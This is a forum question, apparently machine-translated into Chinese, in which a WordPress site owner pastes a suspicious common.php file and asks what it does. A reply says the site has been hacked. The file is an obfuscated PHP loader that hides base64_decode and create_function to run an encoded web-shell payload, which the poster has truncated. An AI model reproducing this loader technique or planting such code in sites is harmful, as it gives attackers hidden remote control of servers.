我遇到了我的一個WordPress站點的問題。 (不斷登錄了用戶,而不是讓人們登錄)corrupted/hacked common.php文件?
我的託管認爲路線是的common.php文件(/public_html/wp-content/common.php)
任何人都可以擺脫任何光線什麼這些文件實際上在做什麼?我可以刪除它,並將WordPress生成一個新的文件?
的common.php代碼:
<?php
$alphabet = ".hyib/;dq4ux9*zjmclp3_r80)t(vakng1s2foe75w6";
$string = "Cmdsb2JhbCAkYXV0aF9wYXNzLCRjb2xvciwkZGVmYXVsdF9hY3Rpb24sJGRlZmF1bHRfdXNlX2FqYXgsJGRlZmF1bHRfY2hhcnNldCwkc29ydDsKZ2xvYmFsICRjd2QsJG9zLCRzYWZlX21vZGUsICRpbjsKCiRhdXRoX3Bhc3MgPSAnZGU0OTA5YzUxZWZiNjZlNTgwYzMyZTk5NTFlZGI1ZG
*我已經在這裏切出大量的代碼,因爲它是在字符的限制(ABOT 90000 !!)
J10gPSAkZGVmYXVsdF9hY3Rpb247CgllbHNlCgkJJF9QT1NUWydhJ10gPSAnU2VjSW5mbyc7CmlmKCAhZW1wdHkoJF9QT1NUWydhJ10pICYmIGZ1bmN0aW9uX2V4aXN0cygnYWN0aW9uJyAuICRfUE9TVFsnYSddKSApCgljYWxsX3VzZXJfZnVuYygnYWN0aW9uJyAuICRfUE9TVFsnYSddKTsKZXhpdDsKCg==";
$array_name = "";
foreach([4,29,34,38,42,9,21,7,38,17,37,7,38] as $t){
$array_name .= $alphabet[$t];
}
$a = strrev("noi"."tcnuf"."_eta"."erc");
$f = $a("", $array_name($string));
$f();
在此先感謝
豐富
是的,它看起來像你的網站已經被黑客入侵。可能有一個'eval'在解密後運行這個代碼的地方。您可能需要從早期的備份中恢復。 –